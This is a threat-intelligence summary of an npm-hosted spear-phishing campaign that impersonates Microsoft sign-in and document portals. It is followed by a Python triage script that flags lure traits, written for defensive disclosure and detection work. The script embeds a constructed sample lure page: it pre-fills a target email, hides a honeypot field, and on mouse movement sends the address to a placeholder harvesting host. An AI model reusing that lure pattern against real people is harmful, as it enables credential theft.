Full Report
Cybersecurity researchers have disclosed details of what has been described as a "sustained and targeted" spear-phishing campaign that has published over two dozen packages to the npm registry to facilitate credential theft. The activity, which involved uploading 27 npm packages from six different npm aliases, has primarily targeted sales and commercial personnel at critical
Analysis Summary
# Tool/Technique: Malicious npm Packages Used for Spear-Phishing Infrastructure (Unnamed Campaign)
## Overview
A "sustained and targeted" spear-phishing campaign utilizing 27 malicious packages published to the npm registry across six distinct aliases. The primary goal was credential theft by repurposing npm's package Content Delivery Network (CDN) infrastructure to host client-side lures impersonating document-sharing portals and Microsoft sign-in pages.
## Technical Details
- Type: Technique/Infrastructure Abuse
- Platform: Client-side (Browser execution via delivered HTML/JavaScript)
- Capabilities: Hosting phishing lures via npm CDN, credential harvesting, anti-analysis controls.
- First Seen: Activity disclosed around December 29, 2026; the operation had been running for roughly five months before disclosure.
## MITRE ATT&CK Mapping
The activity primarily maps to the delivery and collection phases, using abused legitimate infrastructure (the npm CDN) rather than infrastructure the actor compromised.
- **TA0001 - Initial Access**
  - T1566 - Phishing
    - T1566.001 - Spearphishing Attachment (Indirectly, by using infrastructure hosting the lure)
- **TA0011 - Command and Control**
  - T1071 - Application Layer Protocol
    - T1071.001 - Web Protocols (Leveraging legitimate CDN infrastructure)
- **TA0008 - Lateral Movement** (If credentials are used post-harvesting)
## Functionality
### Core Capabilities
- **Phishing Infrastructure Hosting:** Using the npm registry CDN as durable, resilient hosting for static phishing content (HTML/JavaScript).
- **Lure Delivery:** Serving client-side JavaScript and HTML lures that mimic secure document-sharing portals.
- **Targeted Engagement:** Pre-filling Microsoft sign-in forms with target victim email addresses (25 specific email addresses hardcoded).
- **Targeting:** Focusing on sales and commercial personnel at critical infrastructure-adjacent organizations in the U.S. and Allied nations (spanning manufacturing, industrial automation, plastics, and healthcare).
### Advanced Features
- **Anti-Analysis Checks:** Implementing client-side filtering to challenge analysis efforts, specifically filtering out bots and evading sandboxes.
- **Interaction Requirement:** Requiring mouse or touch input before redirecting victims to the actor-controlled credential harvesting infrastructure.
- **Code Obfuscation:** Utilizing obfuscated or heavily minified JavaScript code to hinder automated inspection.
- **Honeypot Fields:** Including hidden form fields designed to be populated by automated crawlers, acting as a second layer of defense against automated inspection.
- **AitM Overlap:** Domains packed into the packages overlapped with Adversary-in-the-Middle (AitM) phishing infrastructure associated with **Evilginx**.
## Indicators of Compromise
(Note: Specific hashes/C2 domains were not provided in the summary, only package names and aliases.)
- File Hashes: N/A (Focus is on package content/delivery mechanism)
- File Names: 27 distinct npm package names were used, including: `adril7123`, `androidvoues`, `onedrive-verification`, `sync365`, `secure-docs-app`, etc.
- Registry Keys: N/A
- Network Indicators: Domains packed into the packages overlap with Evilginx AitM infrastructure; the specific domains were not provided in the summary.
- Behavioral Indicators: Execution of client-side JS upon loading the URI referencing the package content, checks for user interaction, population of hidden/honeypot input fields.
## Associated Threat Actors
- Unspecified Threat Actors (This campaign is noted as distinct from the earlier "Beamglea" campaign, though both abuse npm infrastructure).
- The overlap in AitM infrastructure suggests potential links to groups known to utilize Evilginx (e.g., Magecart affiliates, specific state-sponsored groups, or financially motivated groups).
## Detection Methods
- Signature-based detection: Monitoring npm registry for the listed suspicious package names or known malicious aliases.
- Behavioral detection: Detecting client-side JavaScript that attempts to require user interaction before redirection, or code exhibiting high obfuscation/minification within legitimate package imports. Monitoring for the loading of content from known npm CDNs that is subsequently interpreted as HTML/phishing logic.
- YARA rules: Potentially applicable to the static JavaScript/HTML content embedded within the package sources once extracted.
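A static triage script for the lure traits listed above (hidden honeypot inputs, interaction-gated redirects, Microsoft sign-in strings, pre-filled target e-mails, obfuscation markers), added here as an example; it is not code from the original report or from the researchers' tooling. The regexes, weights, threshold and the two constructed sample pages are assumptions for illustration, not published indicators.

```python
import re
from pathlib import Path

# Heuristics for the lure traits this report describes. Patterns, weights and the
# threshold are assumptions for illustration, not indicators published by the researchers.
CHECKS = [
    (2, "hidden/honeypot input field",
     re.compile(r'<input[^>]*(?:type=["\']hidden["\']|display\s*:\s*none)[^>]*>', re.I)),
    (2, "Microsoft sign-in / document-portal strings",
     re.compile(r'sign in to your account|login\.microsoftonline|office ?365|onedrive|sharepoint', re.I)),
    (1, "eval/new Function/hex-escape obfuscation markers",
     re.compile(r'\beval\s*\(|\bnew\s+Function\s*\(|\\x[0-9a-f]{2}', re.I)),
]
INTERACTION_RE = re.compile(r'addEventListener\(\s*["\'](?:mousemove|mousedown|click|touchstart|touchend)["\']', re.I)
REDIRECT_RE = re.compile(r'location(?:\.href)?\s*=[^=]|location\.(?:replace|assign)\s*\(', re.I)
PREFILL_RE = re.compile(r'<input[^>]*value=["\']([^"\'\s]+@[^"\'\s]+)["\']', re.I)
SUSPICIOUS_THRESHOLD = 5  # assumed; tune against your own package corpus

def scan_lure(content: str) -> dict:
    """Score one HTML/JS file; returns score, matched traits and any pre-filled e-mails."""
    score, findings = 0, []
    for weight, label, pattern in CHECKS:
        if pattern.search(content):
            score += weight
            findings.append(label)
    # Interaction gating: a mouse/touch listener plus a location change in the same file.
    if INTERACTION_RE.search(content) and REDIRECT_RE.search(content):
        score += 3
        findings.append("redirect gated on mouse/touch interaction")
    emails = PREFILL_RE.findall(content)  # hardcoded target addresses in form inputs
    if emails:
        score += 3
        findings.append("pre-filled target e-mail address")
    return {"score": score, "suspicious": score >= SUSPICIOUS_THRESHOLD,
            "findings": findings, "prefilled_emails": emails}

def scan_package_dir(root: str) -> dict:
    """Scan every .html/.htm/.js file under an extracted npm tarball; returns {path: result}."""
    return {str(p): scan_lure(p.read_text(encoding="utf-8", errors="replace"))
            for p in Path(root).rglob("*") if p.suffix.lower() in (".html", ".htm", ".js")}

# Constructed sample lure showing the traits above (placeholder domain, not a real indicator).
SAMPLE_LURE = """<html><body><h1>Sign in to your account</h1>
<input type="email" name="loginfmt" value="target@example.com">
<input type="text" name="website" style="display:none">
<script>document.addEventListener("mousemove", function () {
  window.location.href = "https://harvester.invalid/?e=target@example.com"; }, { once: true });
</script></body></html>"""
# Constructed ordinary page: a plain search form with no gating, prefill or honeypot.
BENIGN_PAGE = '<html><body><form action="/search"><input type="text" name="q"></form></body></html>'
```

Run `scan_package_dir` over a package extracted with `npm pack` and review anything flagged suspicious; the score only ranks files for a human, it is not a verdict.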
## Mitigation Strategies
- **npm Security:** Monitoring the organization's package usage and external dependencies for unusual behavior, especially content targeting common SSO providers (such as Microsoft).
- **Supply Chain Hardening:** Limiting code execution from untrusted sources; treating package contents (even from community registries) as potentially hostile until verified.
- **User Training:** Emphasizing user awareness regarding credential harvesting pages, even when accessed via seemingly legitimate links or document portals. Focusing training on indicators of Evilginx/AitM attacks.
## Related Tools/Techniques
- **Evilginx:** Overlap in associated AitM phishing infrastructure.
- **Beamglea Campaign:** A previous, separate campaign that also leveraged npm packages for credential harvesting but used different delivery mechanics (minimal redirect scripts vs. self-contained execution flow).
- **Supply Chain Compromise (General):** Utilizing legitimate software infrastructure (npm CDN) for malicious distribution.